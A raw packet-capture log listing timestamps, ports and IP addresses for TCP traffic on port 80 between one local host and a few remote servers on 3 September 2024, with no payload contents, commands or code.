Sep 3, 2024 17:13:22.232536077 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:22.248368025 CEST	49735	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:22.248699903 CEST	49736	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:22.253582954 CEST	80	49736	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:22.253608942 CEST	80	49735	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:22.253655910 CEST	49736	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:22.253680944 CEST	49735	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:22.253804922 CEST	49736	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:22.259082079 CEST	80	49736	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:22.305475950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.305593014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.305605888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.305651903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.305682898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.305866003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.305879116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.305892944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.305917025 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.305917025 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.305943012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306266069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306279898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306298971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306302071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306313992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306320906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306329966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306343079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306360960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306360960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306364059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306401014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306405067 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306405067 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306405067 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306416035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306433916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306442976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306452036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306459904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306519032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306544065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306560993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306575060 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306605101 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306612968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306714058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306731939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306747913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306752920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306788921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306788921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306854010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306873083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306885004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306899071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306904078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306912899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306929111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306942940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.306943893 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306943893 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306979895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.306993961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.307312012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.307322979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.307337046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.307351112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.307363987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.307375908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.307399988 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.307400942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.307400942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.307415009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.308722019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.308736086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.308749914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.308778048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.308778048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.308801889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309001923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309015036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309029102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309041023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309063911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309102058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309149027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309211969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309294939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309309959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309322119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309335947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309350967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309362888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309367895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309367895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309367895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309406996 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309422970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309437990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309452057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309465885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309479952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309493065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309499979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309499979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309514999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309551954 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309592009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309604883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309617043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309633970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309634924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309634924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309648037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309649944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309663057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309670925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309684038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309701920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309710979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309726000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309740067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309751987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309793949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309793949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309793949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.309906960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309921026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309933901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309947968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.309978962 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.310044050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.310050011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310064077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310076952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310091019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310103893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310117960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310131073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310142994 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.310144901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310152054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.310159922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310173988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310208082 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.310208082 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.310344934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.310786009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310908079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.310918093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310930967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310946941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310960054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.310973883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311002970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311002970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311002970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311055899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311074018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311074972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311091900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311105013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311105967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311126947 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311126947 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311243057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311330080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311343908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311357975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311371088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311391115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311391115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311464071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311475992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311485052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311490059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311505079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311523914 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311641932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311644077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311659098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311672926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311809063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311822891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311825037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311836004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311851025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311858892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311886072 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311947107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311960936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311978102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.311984062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.311991930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.312005997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.312011003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.312062025 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.312082052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.312096119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.312127113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.312163115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.312163115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.312252045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.312267065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.312278986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.312295914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.312308073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.312361002 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.312361002 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.403891087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404110909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404124975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404139042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404153109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404166937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404187918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404201984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404205084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404272079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404272079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404433012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404445887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404460907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404479980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404499054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404508114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404508114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404508114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404515028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404531002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404597044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404601097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404611111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404611111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404611111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404625893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404639959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404656887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404665947 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404670954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404686928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404692888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404692888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404716015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404753923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.404932976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.404947042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405061960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405076027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405101061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.405160904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.405160904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.405194998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405209064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405221939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405235052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405289888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.405323982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405338049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405342102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.405352116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405369043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405381918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405397892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405402899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.405402899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.405466080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.405466080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.405636072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.405714989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.407157898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407171965 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407187939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407254934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.407296896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407310009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407315016 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.407325983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407340050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407358885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.407358885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.407412052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.407421112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407475948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.407710075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407754898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.407877922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407890081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407902956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407916069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407929897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407943964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.407979012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.407979012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.408034086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408046007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408058882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408075094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408081055 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.408087969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408102989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408107996 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.408149958 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.408168077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408181906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408195019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408210039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408210993 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.408210993 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.408221960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408235073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.408279896 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.408592939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.408777952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408792019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408806086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408821106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408864021 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.408916950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408931971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408934116 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.408946991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408962011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408974886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408989906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.408998013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.408998013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.409059048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409066916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.409066916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.409075022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409090042 CEST	80	49730	52.212.52.84	192.168.2.8
